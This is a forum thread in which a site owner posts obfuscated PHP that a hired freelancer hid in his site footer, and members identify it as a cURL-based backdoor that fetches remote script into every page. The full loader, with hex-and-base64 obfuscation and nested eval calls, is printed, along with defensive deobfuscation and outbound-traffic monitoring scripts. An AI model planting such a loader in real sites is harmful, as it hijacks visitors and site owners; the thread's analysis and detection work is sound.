
Is this code suspicious?

Discussion in 'Cloaking and Content Generators' started by mrsharz, May 7, 2013.

  1. mrsharz (Banned)
    So I hired a guy to do some modification on my site. After he claimed to be done I noticed some error code in my site footer, but it looks suspicious. Obviously he didn't see it, but after I removed the code everything became fine. He put this in my site; do you think it's a backdoor?

    <?php
    if(!function_exists("mystr1s44")){
        // Holder class: each static is a hex-escaped, base64-encoded string
        // ($mystr1s279 = "curl_init", $mystr1s178 = "base64_decode",
        //  $mystr1s381 = the remote URL, $mystr1s382 = "mystr1s2236")
        class mystr1s21 {
            static $mystr1s279="Y3\x56ybF\x39pb\x6d\x6c0";
            static $mystr1s178="b\x61se\x364\x5f\x64ec\x6fd\x65";
            static $mystr1s381="aH\x520\x63\x44ov\x4c3Ro\x5a\x571\x6cLm5\x31b\x47x\x6cZ\x47N\x73b2\x35l\x632\x4eyaX\x420cy\x35jb2\x30\x76an\x461\x5aXJ\x35\x4cTE\x75Ni\x34zL\x6d1\x70b\x695qc\x77=\x3d";
            static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d";
        }
        // Hex-escaped eval(base64_decode(...)) that defines the helpers mystr1s76() and mystr1s44(),
        // which look up one of the statics above by name and base64-decode it
        eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x79R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x65XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4gb\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");
    }
    // Runs only if curl_init exists: fetch the decoded URL with a 5-second connect timeout
    // and echo whatever comes back straight into the page
    if(function_exists(mystr1s76("mys\x74r1s\x3279"))){
        $mystr1s2235 = mystr1s76("m\x79s\x74r\x31s3\x381");   // the URL
        $mystr1s2236 = curl_init();
        $mystr1s2237 = 5;
        curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);
        curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);
        $mystr1s2238 = curl_exec($mystr1s2236);
        curl_close(${mystr1s76("mystr1s382")});   // i.e. curl_close($mystr1s2236)
        echo "$mystr1s2238";
    }
    ?>
     
  2. makemecash (Regular Member)
    Lol, yes. The guy opened a door using PHP cURL, and so now he can transmit code back and forth. It's pretty common, unfortunately.
     
  3. mrsharz (Banned)
    Hey, thanks for answering my question. So I removed this code, but I'm sure there are others that need to be removed. Do you have any idea how I can remove them all? I'm not hiring anyone to do it; I'm fixing my site.
     
  4. Izzma (Regular Member, Canada)
    Analyze your entire script. If you see any PHP functionality that is unnecessary, suspicious, or looks like the above, delete it. Otherwise we cannot determine what is and what isn't legit.
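A way to do the analysis Izzma describes without reading every hex escape by hand, added here as an example and not code from the thread: resolve PHP's \x escapes, base64-decode what falls out, recurse through the eval layers, and flag the usual loader indicators. The only input is the snippet from the first post, embedded below as the sample; the indicator list and the file filter used when walking a web root are this example's own choices, not anything the thread prescribes.

```python
import base64
import binascii
import os
import re
import sys

# Sample input: the loader exactly as posted in the thread (a raw string, so the \x escapes survive).
POSTED_LOADER = r'''<?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s279="Y3\x56ybF\x39pb\x6d\x6c0"; static $mystr1s178="b\x61se\x364\x5f\x64ec\x6fd\x65"; static $mystr1s381="aH\x520\x63\x44ov\x4c3Ro\x5a\x571\x6cLm5\x31b\x47x\x6cZ\x47N\x73b2\x35l\x632\x4eyaX\x420cy\x35jb2\x30\x76an\x461\x5aXJ\x35\x4cTE\x75Ni\x34zL\x6d1\x70b\x695qc\x77=\x3d";
static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x79R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x65XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4gb\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}
if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 = mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 = curl_init();
$mystr1s2237 = 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);
$mystr1s2238 = curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}
?>'''

# PHP double-quoted-string escapes: \xH or \xHH (at most two hex digits), \NNN octal, and singles.
_DQ_ESCAPE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})|\\(.)', re.S)
_SINGLE = {'n': '\n', 't': '\t', 'r': '\r', '\\': '\\', '$': '$', '"': '"'}
# One "..." or '...' literal: group 1 is the quote character, group 2 the body.
_STRING = re.compile(r"""(["'])((?:\\.|(?!\1)[^\\])*)\1""", re.S)
# Indicator patterns (this example's own choice of what is worth a look in a web root).
INDICATORS = {
    'eval': re.compile(r'\beval\s*\('),
    'base64_decode': re.compile(r'\bbase64_decode\s*\('),
    'remote_fetch': re.compile(r'\b(?:curl_init|curl_exec|file_get_contents|fsockopen)\s*\('),
    'hex_escapes': re.compile(r'(?:\\x[0-9A-Fa-f]{2}){4,}'),  # long runs of \xHH inside a literal
}

def unescape_php(body, quote='"'):
    """Resolve escapes the way PHP does for the body of a double- or single-quoted string."""
    if quote == "'":
        return body.replace("\\'", "'").replace("\\\\", "\\")
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        if m.group(2) is not None:
            return chr(int(m.group(2), 8))
        return _SINGLE.get(m.group(3), '\\' + m.group(3))  # PHP keeps unknown escapes as-is
    return _DQ_ESCAPE.sub(repl, body)

def try_base64(text):
    """Decode `text` if it is well-formed base64 of printable text; otherwise return None."""
    if len(text) < 8 or len(text) % 4 or not re.fullmatch(r'[A-Za-z0-9+/]+={0,2}', text):
        return None
    try:
        out = base64.b64decode(text, validate=True).decode('utf-8')
    except (binascii.Error, UnicodeDecodeError):
        return None
    return out if all(ch.isprintable() or ch in '\n\r\t' for ch in out) else None

def decode_layers(src, depth=0, max_depth=6):
    """Peel escape and base64 layers recursively; returns [(depth, kind, plaintext), ...]."""
    found = []
    if depth > max_depth:
        return found
    for quote, body in _STRING.findall(src):
        text = unescape_php(body, quote)
        if text != body:
            found.append((depth, 'unescaped', text))
        decoded = try_base64(text)
        if decoded is not None:
            found.append((depth, 'base64', decoded))
            found.extend(decode_layers(decoded, depth + 1, max_depth))
        elif text != body:  # the escapes hid PHP source that may carry literals of its own
            found.extend(decode_layers(text, depth + 1, max_depth))
    return found

def scan_source(src):
    """Return the indicators that fire on `src` or on anything its strings decode to."""
    decoded = decode_layers(src)
    corpus = [src] + [text for _, _, text in decoded]
    hits = sorted(name for name, rx in INDICATORS.items() if any(rx.search(t) for t in corpus))
    return {'indicators': hits, 'decoded': decoded}

def scan_tree(root, exts=('.php', '.inc', '.phtml')):
    """Walk a web root; yield (path, result) for files that pair eval/base64 with a remote fetch."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding='utf-8', errors='replace') as fh:
                result = scan_source(fh.read())
            hits = set(result['indicators'])
            if 'hex_escapes' in hits or ('remote_fetch' in hits and hits & {'eval', 'base64_decode'}):
                yield path, result

if __name__ == '__main__':
    if len(sys.argv) > 1:  # python scan_loader.py /var/www/html
        targets = scan_tree(sys.argv[1])
    else:  # no argument: analyse the snippet from the thread
        targets = [('<posted snippet>', scan_source(POSTED_LOADER))]
    for path, result in targets:
        print(path, 'indicators:', ', '.join(result['indicators']))
        for depth, kind, text in result['decoded']:
            print('  ' * (depth + 1) + f'[{kind}] {text[:90]!r}')
```

Run without arguments it prints the four indicators and, indented by layer, the strings the snippet hides: "curl_init", "base64_decode", the full http URL the footer fetches, the two eval(base64_decode(...)) layers and the function bodies inside them. Pointed at a web root it lists only files that combine those traits, which is the shortlist worth reading by hand before deleting anything.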
     
  5. ScaryMustard (Registered Member)
    If you don't know how to read PHP, you're going to have to get someone to look at it for you; I really don't see any other way around this.
     
  6. judif414 (Regular Member)
    I think there are Fiverr gigs that will remove these backdoors for you. Just be careful that they don't add backdoors themselves :)
     
  7. BottingWorks (Regular Member, Australia)
    I'd be happy to look at the code for you! Free of charge.

    This sort of thing is very common, so ensure that any freelancers you're hiring have a good reputation and double check the work they're completing.

    Also, did you hire this person through BHW?
     
  8. mrsharz (Banned)
    Nah, if I had hired him on BHW I think the name of this thread would be in capitals with a bunch of !!! and his name + scam, lol. Okay BottingWorks, I will send you my site details through PM soon. Thanks as always, I appreciate it.
     
  9. phatzilla (Supreme Member)
  10. oozyluce (Regular Member; IT Coordinator, Senior Network Administrator; http://www.gaben.tv/)
    That's odd. If it's really pointing there... why? There's nothing in this script that is of interest; I would expect a malware version of jQuery, maybe with anchor texts/links with visibility:hidden parameters.

    The guy who coded that is either really lame, or I'm lame.
     
  11. TZ2011 (Senior Member; occupation: cleaning servers)
    It is part of Ultimate Black Hat System, a package for retarded wannabes who don't know how to drive traffic to their sites, so they steal visitors from other sites, redirecting them with this code to destinations of their choice, usually to Java drive-by shit and affiliate stuff.
     
  12. phatzilla (Supreme Member)

    Check what that file contains.

    It's all really shitty.
     
  13. makemecash (Regular Member)
  14. user999 (Newbie, Canada)
    Perhaps you could find a way to monitor the server's outbound traffic from your domain. That would tell you where the data being sent is going.
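One way to do what user999 suggests on a Linux host, added here as an example and not part of the thread: have iptables log every new outbound TCP connection opened by the web server's user, then summarise the kernel log by destination and port. The iptables rule, the www-data UID, the allowlist of known destinations and the log lines are all constructed for this example.

```python
import re
from collections import Counter

# Assumed iptables rule (this example's own; the thread does not give one):
#   iptables -I OUTPUT -m owner --uid-owner www-data -p tcp -m conntrack --ctstate NEW \
#            -j LOG --log-prefix "WWW-EGRESS: " --log-uid
# Constructed sample of the kernel log lines that rule writes (UID=33 is www-data on Debian-style hosts).
SAMPLE_KERN_LOG = """\
May  7 10:14:02 web1 kernel: [ 1201.4] WWW-EGRESS: IN= OUT=eth0 SRC=10.0.0.5 DST=10.0.0.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=100 DF PROTO=TCP SPT=40001 DPT=3306 WINDOW=29200 RES=0x00 SYN URGP=0 UID=33 GID=33
May  7 10:14:02 web1 kernel: [ 1201.6] WWW-EGRESS: IN= OUT=eth0 SRC=10.0.0.5 DST=203.0.113.10 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=101 DF PROTO=TCP SPT=40002 DPT=80 WINDOW=29200 RES=0x00 SYN URGP=0 UID=33 GID=33
May  7 10:14:05 web1 kernel: [ 1204.1] WWW-EGRESS: IN= OUT=eth0 SRC=10.0.0.5 DST=10.0.0.7 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=102 DF PROTO=TCP SPT=40003 DPT=3306 WINDOW=29200 RES=0x00 SYN URGP=0 UID=33 GID=33
May  7 10:14:05 web1 kernel: [ 1204.3] WWW-EGRESS: IN= OUT=eth0 SRC=10.0.0.5 DST=203.0.113.10 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=103 DF PROTO=TCP SPT=40004 DPT=80 WINDOW=29200 RES=0x00 SYN URGP=0 UID=33 GID=33
May  7 10:14:09 web1 kernel: [ 1208.0] WWW-EGRESS: IN= OUT=eth0 SRC=10.0.0.5 DST=203.0.113.10 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=104 DF PROTO=TCP SPT=40005 DPT=80 WINDOW=29200 RES=0x00 SYN URGP=0 UID=33 GID=33
May  7 10:14:09 web1 kernel: [ 1208.2] WWW-EGRESS: IN= OUT=eth0 SRC=10.0.0.5 DST=198.51.100.5 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=105 DF PROTO=TCP SPT=40006 DPT=443 WINDOW=29200 RES=0x00 SYN URGP=0 UID=33 GID=33
May  7 10:14:10 web1 kernel: [ 1209.0] eth0: link is up
"""

# Destinations the site is known to need (assumed for the example): its database and a payment API.
ALLOWED = {('10.0.0.7', '3306'), ('198.51.100.5', '443')}

PREFIX = re.compile(r'WWW-EGRESS: (?P<fields>.*)$')
FIELD = re.compile(r'(\w+)=(\S*)')

def parse_egress(lines):
    """Yield a {field: value} dict for every WWW-EGRESS line; other kernel messages are skipped."""
    for line in lines:
        m = PREFIX.search(line)
        if m is None:
            continue
        fields = dict(FIELD.findall(m.group('fields')))
        if all(k in fields for k in ('DST', 'PROTO', 'DPT')):
            yield fields

def egress_report(lines, allowed=ALLOWED):
    """Count new outbound connections per (DST, PROTO, DPT); split off those not on the allowlist."""
    counts = Counter((f['DST'], f['PROTO'], f['DPT']) for f in parse_egress(lines))
    unexpected = {k: n for k, n in counts.items() if (k[0], k[2]) not in allowed}
    return counts, unexpected

if __name__ == '__main__':
    counts, unexpected = egress_report(SAMPLE_KERN_LOG.splitlines())
    for (dst, proto, dpt), n in sorted(counts.items(), key=lambda kv: -kv[1]):
        flag = '  <-- not on allowlist' if (dst, proto, dpt) in unexpected else ''
        print(f'{n:4d}  {proto} {dst}:{dpt}{flag}')
```

In the sample, the web server's only unexpected destination is port 80 on one outside host, once per page load, which is exactly the pattern the posted loader produces (its URL is plain http, and it opens a fresh cURL handle on every request). Running `ss -tnp` during a page load ties such a connection to the php-fpm or Apache process, and once the allowlist is right the same `-m owner --uid-owner www-data` match can end in `-j REJECT` for everything else. Use REJECT rather than DROP: the loader sets a 5-second connect timeout and echoes whatever curl_exec returns, so a refused connection makes it print nothing immediately, whereas a silent drop would make every page wait out the timeout.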
     
  15. TheMoneyWizard (Elite Member, Wonderland)
    What does "suspecious" mean?
     
  16. TZ2011 (Senior Member; occupation: cleaning servers)
    "Suspecious" is "suspicious"; if you open your mind a little bit you can figure it out.
    I am not a native English speaker (like many others on the forum) but I understand more than natives, apparently, so let me know if you need more help with translation.
     
  17. saxgod (Regular Member)
    This hack doesn't work like that.

    What essentially happens is that he retrieves a piece of JavaScript from his server and injects it into your site.
    For the moment, the JavaScript is very innocent.

    However, he could just put in a "window.location.href='http://affiliatelinkhere.com';" and every visitor to your site would get redirected to the affiliate link, by their own browsers, so you wouldn't see it on your server. Well, granted, you would see the request to his server to fetch the JavaScript, but it is called jquery.js to make it "unsuspicious".
     
  18. omnipotent$ (Regular Member)
    Hopefully you made a backup of your site to reset things to the way they were before the programmer you hired touched your site.